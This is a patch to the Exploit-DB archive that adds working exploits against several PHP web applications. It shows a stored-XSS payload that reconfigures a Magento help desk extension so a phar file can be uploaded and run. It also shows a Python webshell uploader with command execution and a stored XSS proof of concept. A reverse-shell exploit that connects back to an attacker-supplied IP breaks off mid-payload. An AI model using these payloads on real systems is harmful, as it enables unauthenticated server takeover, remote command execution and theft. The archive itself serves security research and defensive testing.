From 57766a2587409077260bf0d11908b715bdf68de4 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 9 Jul 2021 05:01:53 +0000
Subject: [PATCH] DB: 2021-07-09

5 changes to exploits/shellcodes

Exam Hall Management System 1.0 - Unrestricted File Upload + RCE (Unauthenticated)
Employee Record Management System 1.2 - Stored Cross-Site Scripting (XSS)
Wyomind Help Desk 1.3.6 - Remote Code Execution (RCE)
Online Covid Vaccination Scheduler System 1.0 - Arbitrary File Upload to Remote Code Execution (Unauthenticated)
Wordpress Plugin SP Project & Document Manager 4.21 - Remote Code Execution (RCE) (Authenticated)
---
 exploits/multiple/webapps/50113.txt | 218 ++++++++++++++++++++++++++++
 exploits/php/webapps/50111.py       |  61 ++++++++
 exploits/php/webapps/50112.txt      |  25 ++++
 exploits/php/webapps/50114.py       | 157 ++++++++++++++++++++
 exploits/php/webapps/50115.py       | 139 ++++++++++++++++++
 files_exploits.csv                  |   5 +
 6 files changed, 605 insertions(+)
 create mode 100644 exploits/multiple/webapps/50113.txt
 create mode 100755 exploits/php/webapps/50111.py
 create mode 100644 exploits/php/webapps/50112.txt
 create mode 100755 exploits/php/webapps/50114.py
 create mode 100755 exploits/php/webapps/50115.py

diff --git a/exploits/multiple/webapps/50113.txt b/exploits/multiple/webapps/50113.txt
new file mode 100644
index 000000000..aa77bad3f
--- /dev/null
+++ b/exploits/multiple/webapps/50113.txt
@@ -0,0 +1,218 @@
+# Exploit Title: Wyomind Help Desk 1.3.6 - Remote Code Execution (RCE) 
+# Date: 2021-07-07
+# Exploit Author: Patrik Lantz
+# Vendor Homepage: https://www.wyomind.com/magento2/helpdesk-magento-2.html
+# Version: <= 1.3.6
+# Tested on: Ubuntu 18.04-20.04, Apache, PHP 7.2, Magento 2
+
+
+The Mangento 2 Help Desk extension from Wyomind up to and including version 1.3.6 is vunerable to stored XSS, directory traversal and  unrestricted upload of a dangerous file type. These vulnerabilites combined could lead to code execution.
+
+A XSS payload can be sent via the ticket message from the front-end in the 'Support - My tickets' section. 
+The payload is triggered when an administrator views the ticket in the Magento 2 backend. The following request enable
+the delivery of the XSS payload:
+
+POST /helpdesk/customer/ticket_save/ HTTP/1.1
+Host: <redacted>
+Content-Type: multipart/form-data; boundary=---------------------------243970849510445067673127196635
+Content-Length: 683
+Origin: https://<redacted>
+Connection: close
+Referer: https://<redacted>/helpdesk/customer/ticket_view/
+Cookie: <redacted>
+Upgrade-Insecure-Requests: 1
+
+-----------------------------243970849510445067673127196635
+Content-Disposition: form-data; name="form_key"
+
+<redacted>
+-----------------------------243970849510445067673127196635
+Content-Disposition: form-data; name="object"
+
+Hello
+-----------------------------243970849510445067673127196635
+Content-Disposition: form-data; name="message_cc"
+
+
+-----------------------------243970849510445067673127196635
+Content-Disposition: form-data; name="content"
+
+<p><script>alert(1)</script></p>
+-----------------------------243970849510445067673127196635
+Content-Disposition: form-data; name="hideit"
+
+
+-----------------------------243970849510445067673127196635--
+
+
+
+The following XSS payload shown below can be used to trigger 
+
+1) Enabling file attachments in ticket messages
+2) Adding 'phar' to allowed file extensions
+3) Setting the attachment directory to 'helpdesk/files/../../../pub'
+
+
+<script>
+function successListener(e) {    
+	var doc = e.target.response
+	var action=doc.getElementById('config-edit-form').action;
+	
+	function submitRequest()
+	{
+	var formKey = FORM_KEY;
+	var xhr = new XMLHttpRequest();
+	xhr.open("POST", action, true);
+	xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------14303502862141221692667966053");
+	xhr.withCredentials = true;
+	var body = "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"form_key\"\r\n" + 
+	  "\r\n" + 
+	  formKey + "\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_license]\"\r\n" + 
+	  "\r\n" + 
+	  "0\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_general]\"\r\n" + 
+	  "\r\n" + 
+	  "1\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[general][fields][enabled][value]\"\r\n" + 
+	  "\r\n" + 
+	  "1\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[general][fields][log][value]\"\r\n" + 
+	  "\r\n" + 
+	  "0\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[general][fields][default_email][value]\"\r\n" + 
+	  "\r\n" + 
+	  "\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[general][fields][default_status][value]\"\r\n" + 
+	  "\r\n" + 
+	  "1\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[general][fields][pending_status][value]\"\r\n" + 
+	  "\r\n" + 
+	  "2\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[general][fields][closed_status][value]\"\r\n" + 
+	  "\r\n" + 
+	  "3\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[general][fields][ticket_prefix][value]\"\r\n" + 
+	  "\r\n" + 
+	  "10000\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_frontend]\"\r\n" + 
+	  "\r\n" + 
+	  "1\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[frontend][fields][menu_label][value]\"\r\n" + 
+	  "\r\n" + 
+	  "Support - My Tickets\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[frontend][fields][top_link_enabled][value]\"\r\n" + 
+	  "\r\n" + 
+	  "1\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[frontend][fields][attachments][value]\"\r\n" + 
+	  "\r\n" + 
+	  "1\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_frontend_attachments_settings]\"\r\n" + 
+	  "\r\n" + 
+	  "1\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[frontend][groups][attachments_settings][fields][attachments_extension][value]\"\r\n" + 
+	  "\r\n" + 
+	  "jpeg,gif,png,pdf,phar\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[frontend][groups][attachments_settings][fields][attachments_directory_path][value]\"\r\n" + 
+	  "\r\n" + 
+	  "helpdesk/files/../../../pub\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[frontend][groups][attachments_settings][fields][attachments_upload_max_filesize][value]\"\r\n" + 
+	  "\r\n" + 
+	  "2M\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[frontend][groups][attachments_settings][fields][attachments_post_max_size][value]\"\r\n" + 
+	  "\r\n" + 
+	  "4M\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_emails]\"\r\n" + 
+	  "\r\n" + 
+	  "1\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_emails_customer_settings]\"\r\n" + 
+	  "\r\n" + 
+	  "0\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[emails][groups][customer_settings][fields][confirmation_enabled][value]\"\r\n" + 
+	  "\r\n" + 
+	  "0\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[emails][groups][customer_settings][fields][confirmation_content][value]\"\r\n" + 
+	  "\r\n" + 
+	  "Dear {{customer_firstname}},\x3cbr/\x3e\x3cbr/\x3e\r\n" + 
+	  "Your message has been sent to the support team.\r\n" + 
+	  "Here is the message content:\x3cbr/\x3e\r\n" + 
+	  "\"{{message}}\" \x3cbr/\x3e\x3cbr/\x3e\r\n" + 
+	  "Kind Regards,\r\n" + 
+	  "The Support Team.\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[emails][groups][customer_settings][fields][notification_enabled][value]\"\r\n" + 
+	  "\r\n" + 
+	  "0\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[emails][groups][customer_settings][fields][notification_content][value]\"\r\n" + 
+	  "\r\n" + 
+	  "Hello {{customer_firstname}},\x3cbr/\x3e\x3cbr/\x3e\r\n" + 
+	  "Your ticket \"{{ticket_object}}\" (#{{prefixed_id}}) has been updated.\r\n" + 
+	  "Please login to your account via this link in order to see the new message: {{customer_account_link}}\x3cbr/\x3e\x3cbr/\x3e\r\n" + 
+	  "Regards,\r\n" + 
+	  "The Support Team.\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_emails_support_team_settings]\"\r\n" + 
+	  "\r\n" + 
+	  "0\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[emails][groups][support_team_settings][fields][notification_enabled][value]\"\r\n" + 
+	  "\r\n" + 
+	  "0\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[emails][groups][support_team_settings][fields][notification_content][value]\"\r\n" + 
+	  "\r\n" + 
+	  "You received a new message from a customer.\r\n" + 
+	  "-----------------------------14303502862141221692667966053--\r\n";
+	var aBody = new Uint8Array(body.length);
+	for (var i = 0; i < aBody.length; i++)
+	aBody[i] = body.charCodeAt(i); 
+	xhr.send(new Blob([aBody]));
+	}
+	submitRequest();
+}
+	
+var request = new XMLHttpRequest();  
+request.onload = successListener;    
+request.responseType = 'document';
+request.open('GET', document.querySelector('[data-ui-id="menu-wyomind-helpdesk-configuration"]').querySelector('a').href, true);  
+request.send();
+</script> 
+
+After the XSS payload is executed, it is possible to upload a phar file by attaching files to ticket messages. Upon successful upload, the uploaded files can be requested to trigger the execution of it by requesting
+
+https://[HOSTNAME]/<ticketId>/<messageId>/filename.phar 
+
+ticketId and messageId can be identified after sending the ticket message with the attached phar file. The ticketId is visible in the 
+URL, for example: 
+
+https://[HOSTNAME]/helpdesk/customer/ticket_view/ticket_id/7/
+
+and the messageId can be identified by hovering over the uploaded file link which will be similar to 
+
+https://[HOSTNAME]/helpdesk/customer/message_downloadAttachment/message/40/file/filename.phar
+
+in this case, the messageId is 40.
\ No newline at end of file
diff --git a/exploits/php/webapps/50111.py b/exploits/php/webapps/50111.py
new file mode 100755
index 000000000..d46c20316
--- /dev/null
+++ b/exploits/php/webapps/50111.py
@@ -0,0 +1,61 @@
+# Exploit Title: Exam Hall Management System 1.0 - Unrestricted File Upload + RCE (Unauthenticated)
+# Exploit Author: Davide 'yth1n' Bianchin
+# Contacts: davide dot bianchin at dedagroup dot it
+# Original PoC: https://exploit-db.com/exploits/50103
+# Date: 06.07.2021
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/14205/exam-hall-management-system-full-source-code-using-phpmysql.html
+# Version: 1.0
+# Tested on: Kali Linux
+
+import requests
+from requests_toolbelt.multipart.encoder import MultipartEncoder
+import os
+import sys
+import string
+import random
+import time
+
+host = 'localhost' #CHANGETHIS
+path = 'SourceCode' #CHANGETHIS
+
+url = 'http://'+host+'/'+path+'/pages/save_user.php'
+
+def id_generator(size=6, chars=string.ascii_lowercase):
+	return ''.join(random.choice(chars) for _ in range(size))+'.php'
+
+if len(sys.argv) == 1:
+    print("#########")
+    print("Usage: python3 examhallrce.py command")
+    print("Usage: Use the char + to concatenate commands")
+    print("Example: python3 examhallrce.py whoami")
+    print("Example: python3 examhallrce.py ls+-la")
+    print("#########")
+    exit()
+
+
+filename = id_generator()
+print("Generated "+filename+ " file..")
+time.sleep(2)
+print("Uploading file..")
+time.sleep(2)
+
+   
+
+
+def reverse():
+    command = sys.argv[1]
+    multipart_data = MultipartEncoder({
+        'image': (filename, '<?php system($_GET["cmd"]); ?>', 'application/octet-stream'),
+        'btn_save': ''
+        })
+    r = requests.post(url, data=multipart_data, headers={'Content-Type':multipart_data.content_type})   
+    endpoint = 'http://'+host+'/'+path+'/uploadImage/Profile/'+filename+'' 
+    urlo = 'http://'+host+'/'+path+'/uploadImage/Profile/'+filename+'?cmd='+command+''
+    print("Success, file correctly uploaded at: " +endpoint+ "")
+    time.sleep(1) 
+    print("Executing command in 1 seconds:\n")
+    time.sleep(1)
+    os.system("curl -X GET "+urlo+"")
+
+reverse()
\ No newline at end of file
diff --git a/exploits/php/webapps/50112.txt b/exploits/php/webapps/50112.txt
new file mode 100644
index 000000000..e0a20f745
--- /dev/null
+++ b/exploits/php/webapps/50112.txt
@@ -0,0 +1,25 @@
+# Exploit Title: Employee Record Management System 1.2 - Stored Cross-Site Scripting (XSS)
+# Date: 07 July 2021
+# Exploit Author: Subhadip Nag (mrl0s3r)
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/employee-record-management-system-in-php-and-mysql/
+# Tested on: Server: XAMPP
+
+# Description #
+
+Employee Record Management System 1.2 is vulnerable to stored cross site scripting (xss) in the Edit My Education because of insufficient user supplied data.
+
+
+# Proof of Concept (PoC) : Exploit #
+
+1) Goto: http://localhost/ERMSP/erms/loginerms.php
+2) Login: Login as a User(given username and password)
+3) Go To Edit My Education and Edit My Exp
+4) Enter the payload: <script>alert(1)</script>
+5) Click Update
+6) Go to 'My Education' option
+7) Our XSS attack successful
+
+# PoC image
+1) https://ibb.co/LS78xjX
+2) https://ibb.co/9G0Pbxb
\ No newline at end of file
diff --git a/exploits/php/webapps/50114.py b/exploits/php/webapps/50114.py
new file mode 100755
index 000000000..b257024cc
--- /dev/null
+++ b/exploits/php/webapps/50114.py
@@ -0,0 +1,157 @@
+# Exploit Title: Online Covid Vaccination Scheduler System 1.0 - Arbitrary File Upload to Remote Code Execution (Unauthenticated)
+# Date: 2021-07-07
+# Exploit Author: faisalfs10x
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scheduler.zip
+# Version: 1.0
+# Tested on: Windows 10, XAMPP
+
+
+"""
+################
+# Description  #
+################
+
+1. The admin panel UI login can be assessed at http://{ip}/scheduler/admin/login.php. Due to the client-side input validation implemented within scripts, it is possible to bypass and access the admin panel UI by making request to "http://localhost/scheduler/admin/?page=user" and removing the javascript tag '<script>location.href="http://localhost/scheduler/admin/login.php"</script>' in the server response body. 
+For making the process easier, we can use burp "Match and Replace" option to automatically replace the javascript tag parts of responses body passing through the proxy.
+2. The admin panel has an upload function of profile photo accessible at http://localhost/scheduler/admin/?page=user. An attacker could upload a malicious file such as shell.php with the Content-Type: image/png. Then, the attacker have to visit the uploaded profile photo to access the shell.
+
+
+#####################
+# PoC for webshell  #
+#####################
+
+Request:
+========
+
+POST /scheduler/classes/Users.php?f=save HTTP/1.1
+Host: localhost
+Content-Length: 721
+sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
+Accept: */*
+X-Requested-With: XMLHttpRequest
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYrg9YZykFY2bmNqY
+Origin: http://localhost
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://localhost/scheduler/admin/?page=user
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=a5d66tonur7vir28rtoc049127
+Connection: close
+
+------WebKitFormBoundaryYrg9YZykFY2bmNqY
+Content-Disposition: form-data; name="id"
+
+1
+------WebKitFormBoundaryYrg9YZykFY2bmNqY
+Content-Disposition: form-data; name="firstname"
+
+Adminstrator
+------WebKitFormBoundaryYrg9YZykFY2bmNqY
+Content-Disposition: form-data; name="lastname"
+
+Admin
+------WebKitFormBoundaryYrg9YZykFY2bmNqY
+Content-Disposition: form-data; name="username"
+
+admin
+------WebKitFormBoundaryYrg9YZykFY2bmNqY
+Content-Disposition: form-data; name="password"
+
+
+------WebKitFormBoundaryYrg9YZykFY2bmNqY
+Content-Disposition: form-data; name="img"; filename="rev.php"
+Content-Type: image/png
+
+<?php echo "output: ";system($_GET['rev']); ?> # shell content here
+------WebKitFormBoundaryYrg9YZykFY2bmNqY--
+
+
+####################
+# Webshell access: #
+####################
+
+# Webshell access via:
+PoC: http://localhost/scheduler/uploads/{random_number}_rev.php?rev=whoami
+
+# Output:
+output: windows10/user
+
+"""
+
+##################################################
+# Reverse shell exploit code for windows target: #
+##################################################
+
+#!/usr/bin/python
+
+import requests
+import sys
+import string
+import random
+import urllib.request
+from requests_html import HTMLSession
+
+if len(sys.argv) < 4:
+    print('\033[1;32;40m [+] Usage: python3 '+sys.argv[0]+' <target_ip> <attacker_ip> <attacker_port>')
+    exit()
+
+RHOST = sys.argv[1]
+RPORT = '80'
+
+LHOST = sys.argv[2]
+LPORT = sys.argv[3]
+
+if not RHOST.startswith('http://') and not RHOST.startswith('https://'):
+    RHOST = "http://" + RHOST
+
+# if not RHOST.endswith('/'):
+#     RHOST = RHOST + "/"
+
+# RHOST = '127.0.0.1'
+# RPORT = '80'
+# LHOST = '192.168.8.117'
+# LPORT = '4444'
+
+shellpath = f"{RHOST}:{RPORT}/scheduler/uploads/" # shell will be uploaded here
+
+let = string.ascii_lowercase
+shellfilename = ''.join(random.choice(let) for i in range(5))+".php" # or just static shellfilename = 'rev.php'
+
+req_url = f"{RHOST}:{RPORT}/scheduler/classes/Users.php?f=save" # endpoint for uploading shell
+
+req_headers = {"sec-ch-ua": "\"Chromium\";v=\"91\", \" Not;A Brand\";v=\"99\"", 
+"Accept": "*/*", 
+"X-Requested-With": "XMLHttpRequest", 
+"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36", 
+"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryYrg9YZykFY2bmNqY",
+"Accept-Language": "en-US,en;q=0.9", 
+"Connection": "close"}
+
+req_data = "------WebKitFormBoundaryYrg9YZykFY2bmNqY\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n1\r\n------WebKitFormBoundaryYrg9YZykFY2bmNqY\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nAdminstrator\r\n------WebKitFormBoundaryYrg9YZykFY2bmNqY\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nAdmin\r\n------WebKitFormBoundaryYrg9YZykFY2bmNqY\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\nadmin\r\n------WebKitFormBoundaryYrg9YZykFY2bmNqY\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n------WebKitFormBoundaryYrg9YZykFY2bmNqY\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+shellfilename+"\"\r\nContent-Type: image/png\r\n\r\n<?php\r\n\r\nheader('Content-type: text/plain');\r\n$ip   = \""+LHOST+"\"; \r\n$port = \""+LPORT+"\"; \r\n$payload = \"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